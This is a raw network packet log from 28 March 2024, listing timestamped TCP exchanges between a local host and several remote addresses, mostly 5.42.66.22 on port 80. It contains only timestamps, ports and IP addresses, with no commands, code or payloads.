Mar 28, 2024 09:14:59.849522114 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.849559069 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.849591970 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.849807978 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.849823952 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.849849939 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.849881887 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.852368116 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.852391958 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.852421999 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.852444887 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.852664948 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.852679968 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.852706909 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.852725983 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.854899883 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.854919910 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.855004072 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.855004072 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.855809927 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.855834007 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.855859995 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.855889082 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.857474089 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.857490063 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.857525110 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.857547998 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.858935118 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.858952045 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.858984947 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.859019041 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.859894991 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.859920979 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.859939098 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.859961033 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.862056971 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.862072945 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.862116098 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.862410069 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.862423897 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.862447977 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.862472057 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.864912033 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.864932060 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.864962101 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.864980936 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.865077972 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.865111113 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.865154982 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.867357969 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.867413044 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.867449045 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.867472887 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.868071079 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.868086100 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.868127108 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.869785070 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.869798899 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.869843960 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.871068954 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.871083021 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.871120930 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.871138096 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.872227907 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.872241020 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.872287989 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.874001980 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.874022007 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.874051094 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.874078035 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.874629021 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.874641895 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.874664068 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.874686956 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.876230001 CET	443	49767	172.67.218.160	192.168.2.4
Mar 28, 2024 09:14:59.876960993 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.876986980 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.877000093 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.877012968 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.877018929 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.877043962 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.877047062 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.877070904 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.879447937 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.879478931 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.879487991 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.879513979 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.879890919 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.879904985 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.879944086 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.880238056 CET	443	49766	104.21.82.182	192.168.2.4
Mar 28, 2024 09:14:59.881942987 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.881980896 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.881983995 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.882016897 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.882750988 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.882832050 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.882836103 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.882865906 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.884253025 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.884267092 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.884289026 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.884305954 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.885494947 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.885526896 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.885551929 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.885571957 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.886579990 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.886590004 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.886625051 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.888370037 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.888385057 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.888427973 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.888894081 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.888921022 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.888936043 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.888967991 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.891158104 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.891174078 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.891185999 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.891199112 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.891211987 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.891238928 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.891238928 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.891261101 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.893507004 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.893536091 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.893572092 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.893845081 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.893886089 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.893903971 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.893929958 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.895884991 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.895900011 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.895927906 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.895946026 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.896573067 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.896593094 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.896625042 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.896640062 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.898206949 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.898221016 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.898251057 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.898272038 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.899306059 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.899318933 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.899367094 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.900468111 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.900482893 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.900520086 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.901947975 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.901962996 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.901994944 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.902007103 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.902772903 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.902800083 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.902815104 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.902832985 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.904670000 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.904700041 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.904763937 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.904763937 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.905020952 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.905034065 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.905056000 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.905075073 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.907206059 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.907249928 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.907263041 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.907282114 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.907290936 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.907321930 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.907330036 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.907399893 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.909641981 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.909661055 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.909694910 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.909831047 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.909843922 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.909868002 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.909902096 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.911737919 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.911751032 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.911803961 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.911803961 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.912231922 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:14:59.912288904 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:14:59.912409067 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.912420988 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.912468910 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.913880110 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.913893938 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.913922071 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.913940907 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.914988995 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.915045023 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.915045023 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.915082932 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.916140079 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.916184902 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.916250944 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.916289091 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.917876959 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.917890072 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.917934895 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.918368101 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.918406963 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.918414116 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.918440104 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.920101881 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.920116901 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.920156956 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.920417070 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.920453072 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.920475006 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.920499086 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.922605038 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.922619104 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.922631025 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.922643900 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.922677040 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.922719955 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.922723055 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.924709082 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.924721956 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.924770117 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.924770117 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.925052881 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.925065994 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.925116062 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.926862955 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.926918030 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.927505016 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.927521944 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.927558899 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.927584887 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.927931070 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.927994967 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.928054094 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.928054094 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.929963112 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.929977894 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.930011034 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.930026054 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.930092096 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.930129051 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.930164099 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.930205107 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.932210922 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.932233095 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.932256937 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.932271957 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.932302952 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.932342052 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.932346106 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.932373047 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.934293985 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.934324980 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.934331894 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.934366941 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.934714079 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.934756994 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.934763908 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.934793949 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.936333895 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.936378956 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.936384916 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.936419964 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.937288046 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.937315941 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.937324047 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.937383890 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.938375950 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.938406944 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.938431978 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.938448906 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.939469099 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.939503908 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.939512968 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.939538002 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.940469980 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.940493107 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.940510988 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.940529108 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.941773891 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.941790104 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.941823959 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.941854000 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.942465067 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.942509890 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.942512989 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.942548037 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.944087029 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.944101095 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.944139957 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.944530964 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.944565058 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.944591045 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.944631100 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.946398973 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.946434021 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.946448088 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.946471930 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.946499109 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.946511984 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.946552992 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.948565960 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.948579073 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.948625088 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.948658943 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.948699951 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.948703051 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.948741913 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.948832989 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.950439930 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.950494051 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.950511932 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.950542927 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.951344013 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.951397896 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.951442003 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.952388048 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.952402115 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.952433109 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.952460051 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.953227997 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.953285933 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.953331947 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.954343081 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.954376936 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.954391003 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.954416037 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.955473900 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.955482960 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.955528975 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.956300974 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.956329107 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.956345081 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.956368923 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.957684040 CET	80	49735	5.42.66.22	192.168.2.4
